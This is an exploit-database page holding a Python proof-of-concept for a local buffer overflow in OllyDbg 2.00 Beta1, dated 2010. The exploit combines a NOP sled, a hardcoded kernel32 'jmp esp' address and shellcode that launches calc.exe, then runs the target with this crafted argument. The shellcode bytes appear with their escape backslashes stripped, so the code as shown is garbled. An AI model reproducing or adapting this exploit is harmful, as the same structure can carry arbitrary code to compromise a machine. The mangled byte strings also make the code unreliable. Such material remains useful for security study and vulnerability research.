Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit
# Published : 2010-02-15
# Author : _SuBz3r0_
# Previous Title : OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Next Title : CastRipper 2.50.70 (.asx) Playlist Stack Overflow Exploit

# Exploit Title: [Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit]
# Date: [2010-02-15]
# Author: [_SuBz3r0_]
# Software Link: [http://www.ollydbg.de/version2.html]
# Version: [2.00 Beta 1]
# Tested on: [XP SP3]
# CVE : [if exists]
# Code :
#Ollydbg2 v2.00 beta1 Exploit in Python
print ""
print "##############################################"
print "# _SuBz3r0_ #"
print "##############################################"
print ""
print "Ollydbg v2.00 beta 1 local overflow Exploit"
print "Just For Fun"
print "exploit = [NOP] + [jmp ESP] + [SH3LLC0DE]"
print "Shellcode = calc.exe"
print ""
print "Greetz:piloo le canari & MaX"
print "Tested on: French Windows Xp Sp3 fully Patched"
print ""

import os
import sys

#path to ollydbg.exe
program = 'c:\ollydbg.exe'

#exploit = [NOP] + [jmp ESP] + [SH3LLC0DE]
#overflow =786*'x90'
#eip = "x13x44x87x7c" : kernel32.dll jmp esp
#Shellcode pop up calc.exe
exploit =786*'x90'+'x13'+'x44'+'x87'+'x7c'+''.join([
'xb4x31xf8x2dx84xe3x04x35xb8x3cx14x46x34x48',
'x67xfcx31xc9x83xe9xe2xe8xffxffxffxffxc0x5e',
'x81x76x0ex03xf9xd8x37x83xeexfcxe2xf4xffx11',
'x9cx37x03xf9x53x72x3fx72xa4x32x7bxf8x37xbc',
'x4cxe1x53x68x23xf8x33x7ex88xcdx53x36xedxc8',
'x18xaexafx7dx18x43x04x38x12x3ax02x3bx33xc3',
'x38xadxfcx33x76x1cx53x68x27xf8x33x51x88xf5',
'x93xbcx5cxe5xd9xdcx88xe5x53x36xe8x70x84x13',
'x07x3ax87x06xf5x99x8ex53x88xbfxe8xbcx43xf5',
'x53x47x1fx54x53x5fx0bx70x20xb4xc3x93x88x5f',
'xf3x73xdcx68x6bx61x26xbdx0dxaex27xd0x60x98',
'xb4x54x03xf9xd8x37'])

print ""
os.execl(program,program,program,exploit)